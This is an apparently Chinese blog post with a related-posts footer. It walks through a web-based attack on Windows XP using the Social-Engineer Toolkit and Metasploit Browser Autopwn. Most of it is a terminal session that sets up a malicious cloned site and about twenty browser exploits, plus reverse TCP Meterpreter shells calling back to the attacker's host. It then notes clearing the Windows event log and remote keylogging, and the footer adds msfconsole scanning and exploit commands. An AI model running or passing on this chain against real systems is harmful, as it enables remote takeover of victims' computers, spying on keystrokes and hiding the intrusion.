网页入侵(适用于windows xp,只看思路)

[email protected]:~# setoolkit

Do you agree to the terms of service [y/n]:y

Select from the menu:

1)Social-Engineering Attacks

2)Penetration Testing (Fast-Track)

3)Third Party Modules

4)Update the Social-Engineer Toolkit

5)Update SET configuration

6)Help, Credits, and About

99)Exit the Social-Engineer Toolkit

set> 1

Select from the menu:

1)Spear-Phishing Attack Vectors

2)Website Attack Vectors

3)Infectious Media Generator

4)Create a Payload and Listener

5)Mass Mailer Attack

6)Arduino-Based Attack Vector

7)Wireless Access Point Attack Vector

8)QRCode Generator Attack Vector

9)Powershell Attack Vectors

10)SMS Spoofing Attack Vector

11)Third Party Modules

99)Return back to the main menu.

set> 2

1)Java Applet Attack Method

2)Metasploit Browser Exploit Method

3)Credential Harvester Attack Method

4)Tabnabbing Attack Method

5)Web Jacking Attack Method

6)Multi-Attack Web Method

7)Full Screen Attack Method

8)HTA Attack Method

99)Return to Main Menu

set:webattack>2

1)Web Templates

2)Site Cloner

3)Custom Import

99)Return to Webattack Menu

set:webattack>1

[-] NAT/Port Forwarding can be used in thecases where your SET machine is

[-] not externally exposed and may be adifferent IP address than your reverse listener.

set> Are you using NAT/Port Forwarding[yes|no]: no

[-] Enter the IP address of your interfaceIP or if your using an external IP, what

[-] will be used for the connection backand to house the web server (your interface address)

set:webattack> IP address or hostnamefor the reverse connection:192.168.1.117  (kali)

1.Java Required

2.Google

3.Facebook

4.Twitter

5.Yahoo

set:webattack> Select a template:1

Enter the browser exploit you would like touse [8]:

1)Adobe Flash Player ByteArray Use After Free (2015-07-06)

2)Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)

3)Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

4)MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)

5)MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)

6)Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)

7)Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)

8)Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)

9)Java Applet JMX Remote Code Execution (2013-01-10)

10)MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)

11)Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)

12)Java 7 Applet Remote Code Execution (2012-08-26)

13)Microsoft Internet Explorer execCommand Use-After-Free Vulnerability(2012-09-14)

14)Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)

15)Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)

16)MS12-037 Internet Explorer Same ID Property Deleted Object Handling MemoryCorruption (2012-06-12)

17)Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)

18)Adobe Flash Player Object Type Confusion (2012-05-04)

19)Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)

20)MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)

21)Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)

22)MS11-050 IE mshtml!CObjectElement Use After Free  (2011-06-16)

23)Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)

24)Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute(2011-06-01)

25)Internet Explorer CSS Import Use After Free (2010-11-29)

26)Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)

27)Internet Explorer CSS Tags Memory Corruption (2010-11-03)

28)Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)

29)Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)

30)Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)

31)Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)

32)Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)

33)Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow(2010-09-07)

34)Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)

35)Microsoft Help Center XSS and Command Execution (2010-06-09)

36)Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)

37)Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)

38)Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)

39)Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)

40)Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)

41)Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)

42)Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)

43)Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)

44)FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)

45)FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)

46)Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>46

1)Windows Shell Reverse_TCP              Spawn a command shell on victim and send back to attacker

2)Windows Reverse_TCP Meterpreter        Spawn a meterpreter shell on victim and send back to attacker

3)Windows Reverse_TCP VNC DLL            Spawn a VNC server on victim and send back to attacker

4)Windows Shell Reverse_TCP X64          Windows X64 Command Shell, Reverse TCP Inline

5)Windows Meterpreter Reverse_TCP X64    Connect back to the attacker (Windows x64), Meterpreter

6)Windows Meterpreter Egress Buster      Spawn a meterpreter shell and find a port home via multiple ports

7)Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

8)Windows Meterpreter Reverse DNS        Use a hostname instead of an IP address and use Reverse Meterpreter

9)Download/Run your Own Executable       Downloads an executable and runs it

set:payloads>2

set:payloads> Port to use for thereverse [443]:443     (这里执行时间有点长)

[*]Cloning the website:

[*] This could take a little bit...

[*] Injecting iframes into cloned websitefor MSF Attack....

[*] Malicious iframe injectionsuccessful...crafting payload.

[*] Apache appears to be running, movingfiles into Apache‘s home

***************************************************

Web Server Launched. Welcome to the SET WebAttack.

***************************************************

[--] Tested on Windows, Linux, and OSX [--]

[--] Apache web server is currently in usefor performance. [--]

[*] Moving payload into cloned website.

[*] The site has been moved. SET Web Serveris now listening..

[-] Launching MSF Listener...

[-] This may take a few to load MSF...

+-------------------------------------------------------+

|  METASPLOIT by Rapid7                                 |

+---------------------------+---------------------------+

|      __________________   |                           |

|  ==c(______(o(______(_()  ||""""""""""""|======[***  |

|             )=\           | | EXPLOIT   \            |

|            // \\          | |_____________\_______    |

|           //   \\        | |==[msf >]============\   |

|          //     \\       | |______________________\  |

|         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |

|        //         \\     |  *********************    |

+---------------------------+---------------------------+

|      o O o                |        \‘\/\/\/‘/         |

|              o O          |         )======(          |

|                 o         |      .‘  LOOT  ‘.       |

||^^^^^^^^^^^^^^|l___      |      /   _||__   \       |

||    PAYLOAD     |""\___, |     /   (_||_     \      |

||________________|__|)__| |    |     __||_)    |     |

||(@)(@)"""**|(@)(@)**|(@) |   "       ||       "     |

|  = = = = = = = = = = = =  |    ‘--------------‘      |

+---------------------------+---------------------------+

Taking notes in notepad? Have MetasploitPro track & report

your progress and findings -- learn more onhttp://rapid7.com/metasploit

=[ metasploit v4.12.23-dev                        ]

+ -- --=[ 1577 exploits - 907 auxiliary -272 post        ]

+ -- --=[ 455 payloads - 39 encoders - 8nops             ]

+ -- --=[ Free Metasploit Pro trial:http://r-7.co/trymsp ]

[*] Processing /root/.set//meta_config forERB directives.

resource (/root/.set//meta_config)> useauxiliary/server/browser_autopwn

resource (/root/.set//meta_config)> setPAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

resource (/root/.set//meta_config)> setLHOST 192.168.1.117

LHOST => 192.168.1.117

resource (/root/.set//meta_config)> setLPORT 443

LPORT => 443

resource (/root/.set//meta_config)> setURIPATH /

URIPATH => /

resource (/root/.set//meta_config)> setSRVPORT 8080

SRVPORT => 8080

resource (/root/.set//meta_config)> setExitOnSession false

ExitOnSession => false

resource (/root/.set//meta_config)>exploit -j

[*] Auxiliary module running as backgroundjob

[*] Setup

msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host192.168.1.117...

[*] ---

[*] Starting exploitandroid/browser/webview_addjavascriptinterface with payloadandroid/meterpreter/reverse_tcp

[*] Starting exploitandroid/browser/webview_addjavascriptinterface with payloadandroid/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/XJyavBIacR

[*] Local IP:http://192.168.1.117:8080/XJyavBIacR

[*] Server started.

[*] Starting exploitmulti/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp

[*] Using URL:http://0.0.0.0:8080/QGlDpPXcx

[*] Local IP: http://192.168.1.117:8080/QGlDpPXcx

[*] Server started.

[*] Starting exploitmulti/browser/firefox_tostring_console_injection with payloadgeneric/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/ARlpIFLe

[*] Local IP:http://192.168.1.117:8080/ARlpIFLe

[*] Server started.

[*] Starting exploitmulti/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp

[*] Using URL:http://0.0.0.0:8080/SOOmPaKWujh

[*] Local IP:http://192.168.1.117:8080/SOOmPaKWujh

[*] Server started.

[*] Starting exploit multi/browser/java_atomicreferencearraywith payload java/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/xGsBkydiyDEQ

[*] Local IP:http://192.168.1.117:8080/xGsBkydiyDEQ

[*] Server started.

[*] Starting exploitmulti/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/WtYy

[*] Local IP:http://192.168.1.117:8080/WtYy

[*] Server started.

[*] Starting exploitmulti/browser/java_jre17_provider_skeleton with payloadjava/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/YRcEw

[*] Local IP:http://192.168.1.117:8080/YRcEw

[*] Server started.

[*] Starting exploitmulti/browser/java_jre17_reflection_types with payloadjava/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/XTCiGPcUSrL

[*] Local IP: http://192.168.1.117:8080/XTCiGPcUSrL

[*] Server started.

[*] Starting exploitmulti/browser/java_rhino with payload java/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/bzfzBWGZjB

[*] Local IP:http://192.168.1.117:8080/bzfzBWGZjB

[*] Server started.

[*] Starting exploitmulti/browser/java_verifier_field_access with payloadjava/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/akFIwW

[*] Local IP:http://192.168.1.117:8080/akFIwW

[*] Server started.

[*] Starting exploit multi/browser/opera_configoverwritewith payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/jFdeDrFt

[*] Local IP:http://192.168.1.117:8080/jFdeDrFt

[*] Server started.

[*] Starting exploitwindows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/ajEThoWib

[*] Local IP:http://192.168.1.117:8080/ajEThoWib

[*] Server started.

[*] Starting exploitwindows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/oeredhZHxbFn

[*] Local IP:http://192.168.1.117:8080/oeredhZHxbFn

[*] Server started.

[*] Starting exploitwindows/browser/ie_cgenericelement_uaf with payloadwindows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/TIMDwI

[*] Local IP:http://192.168.1.117:8080/TIMDwI

[*] Server started.

[*] Starting exploitwindows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/JjYZ

[*] Local IP:http://192.168.1.117:8080/JjYZ

[*] Server started.

[*] Starting exploitwindows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/sUtiNZGyAVn

[*] Local IP:http://192.168.1.117:8080/sUtiNZGyAVn

[*] Server started.

[*] Starting exploit windows/browser/mozilla_nstreerangewith payload windows/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/kpaPwyqlTXpvM

[*] Local IP:http://192.168.1.117:8080/kpaPwyqlTXpvM

[*] Server started.

[*] Starting exploitwindows/browser/ms13_080_cdisplaypointer with payloadwindows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/skqCsHFX

[*] Local IP:http://192.168.1.117:8080/skqCsHFX

[*] Server started.

[*] Starting exploitwindows/browser/ms13_090_cardspacesigninhelper with payloadwindows/meterpreter/reverse_tcp

[*] Using URL:http://0.0.0.0:8080/vUMSlRJDHh

[*] Local IP:http://192.168.1.117:8080/vUMSlRJDHh

[*] Server started.

[*] Starting exploitwindows/browser/msxml_get_definition_code_exec with payloadwindows/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/DTsZvlBS

[*] Local IP:http://192.168.1.117:8080/DTsZvlBS

[*] Server started.

[*] Starting handler forwindows/meterpreter/reverse_tcp on port 3333

[*] Starting handler forgeneric/shell_reverse_tcp on port 6666

[*] Started reverse TCP handler on192.168.1.117:3333

[*] Starting the payload handler...

[*] Starting handler forjava/meterpreter/reverse_tcp on port 7777

[*] Started reverse TCP handler on192.168.1.117:6666

[*] Started reverse TCP handler on192.168.1.117:7777

[*] Starting the payload handler...

[*] Starting the payload handler...

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.117:8080/

[*] Server started.               (服务已经启动)(回车)

客户端访问http://192.168.1.117:8080/

清理windows event log

远程键盘监控

exit -y          退出所有服务。

时间: 2024-10-28 23:40:49

网页入侵(适用于windows xp,只看思路)的相关文章

入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage

[email protected]:~# msfconsole msf > workspace msf > db_status msf > workspace -a testlab msf > db_nmap -T4 -A 192.168.1.78 msf > hosts msf > services msf exploit(ms06_040_netapi) > searchnetapi Matching Modules ================ Name

适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux )

为了解决Windows远程桌面访问Ubuntu 12.04 之一 中提到的VNC远程桌面的缺点(见http://www.linuxidc.com/Linux/2012-07/64801.htm),我们采用第二种方法XRDP,该方法支持多用户登录并远程桌面. 1.首先参考Windows远程桌面访问Ubuntu 12.04 之安装VNC中提到的安装GNOME桌面方法(点击这里): 2.进入GNOME界面,在左上角进入系统->首选项->桌面共享进行如下设置. 我们共享所使用的协议是rdp,所以我们要

有关WINDOWS XP登录密码的几种方法

网上关于破解WINDOWS XP登录密码的几种方法很多,但许多根本不行.我现在总结自己试过几种,这几种方法其实均比较菜的,但可行的.WINDOWS XP登录是由SAM 文件管理的,总体来说“山姆大叔”是比较难搞定的,所以网上许多方法不行的原因吧.上次在网上看到关于一篇关于SAM 文件的文章,写得不错,但没能收藏起来.反正有不少人在研究这个.我想就是有了破解的方法,高手们也不一定全公布吧,这是由于大家不难知道的原因——安全,他们不便公布!如果很轻易就破了的话,那微软一定要打这个补丁的,那他们的成果

Windows XP运行命令

运行程序&运行命令辅助功效选项access.cpl添加硬件向导hdwwiz.cpl添加或者删除程序appwiz.cpl管理工具control admintools自动更新w pl.cpl Bltooth文件传送向导fsquirt计算器calc证书管理节制台certmgr.msc字符照射表charmap磁盘查抄工具chkdsk剪贴簿查看器clipbrd命令行提示符cmd组件服务dcomcnfg计算机管理compmgmt.msc日期和时间属性timedate.cpl DDE同享ddeshare装备管

Windows XP与Windows 7系统常见漏洞

1.Windows XP系统常见漏洞 Windows XP系统常见的漏洞有UPNP服务漏洞.升级程序漏洞.帮助和支持中心漏洞.压缩文件夹漏洞.服务拒绝漏洞.Windows Media Player漏洞.RDP漏洞.VM漏洞.热键漏洞.账号快速切换漏洞等. (1)UPNP服务漏洞 漏洞描述:允许攻击者执行任意指令. Windows XP默认启动的UPNP服务存在严重安全漏洞.UPNP(Universal Plug and Play)体系面向无线设备.PC和智能应用,提供普遍的对等网络连接,在家用信

在32位PC机上实现Windows XP和CentOS 6.4双系统

昨晚成功地实现了Windows XP和CentOS 6.4双系统,第一次在实际硬件上运行了CentOS. 其实网络上很多教程都说得很清楚了,我在这里把自己的经验和关键点写一下. 我也是用U盘的方式来安装的CentOS,在这之前,电脑上已经有了XP系统,主分区有一个,15G,就是XP的,扩展分区里逻辑分区若干,专门为/和/home还有/swap预留了三个逻辑分区,分别为15G,20G和2G. U盘是8G,FAT32格式.电脑BIOS修改启动方式之类的相信大家都懂的. 1.网上有篇帖子说用Ultra

Windows XP SP3中远程桌面实现多用户登陆

1 [原创]Windows XP SP3中远程桌面实现多用户登陆 现在电脑我想都可以在远程控制和远程协助了吧(xp,sp2,sp3),现在一个问题,你想远程操控你的电脑,但是你电脑有人用,你好意思让他退出~然后你在远程控制?呵呵,下面Star我为他家说说sp3多用户控制的弄法~~sp2这些都类似~具体没有试.. 案例:电脑建2个用户,一个用户你专用(假设为:xp1),一个用户给别人用(假设为:xp2)~自己看着办~如果你远程控制你的电脑通过电脑进入你的用户名xp1,这个时候你会发现,弹出一个提示

【搭建开发环境】在 Windows XP 中参与开源项目,搭建 git 和 cygwin 开发环境

引言 只有一台 Windows XP 家用机,却想在诸如 [email protected] 之类的开源社区参与开发,本文提供一个入门级的开发环境搭建指引. 涉及工具:Eclipse,EGit,Cygwin. Git git 是一个类似 svn 的版本控制系统.网上有很多基于 git 的在线代码托管平台,如 GitHub.OSC 等.由于伟大的 GFW,这里仅介绍如何使用 Eclipse 的 EGit 插件与 [email protected] 交互. 1. 安装 Eclipse Kepler,

快速自检电脑是否被黑客入侵过(Windows版)

有时候会感觉自己电脑行为有点奇怪, 比如总是打开莫名其妙的网站, 或者偶尔变卡(网络/CPU), 似乎自己"中毒"了, 但X60安全卫士或者X讯电脑管家扫描之后又说你电脑"非常安全", 那么有可能你已经被黑客光顾过了. 这种时候也许要专业的取证人员出场, 但似乎又有点小提大作. 因此本文介绍一些低成本的自检方法, 对于个人用户可以快速判断自己是否已经被入侵过. 1. 异常的日志记录 通常我们需要检查一些可疑的事件记录, 比如: "Event log ser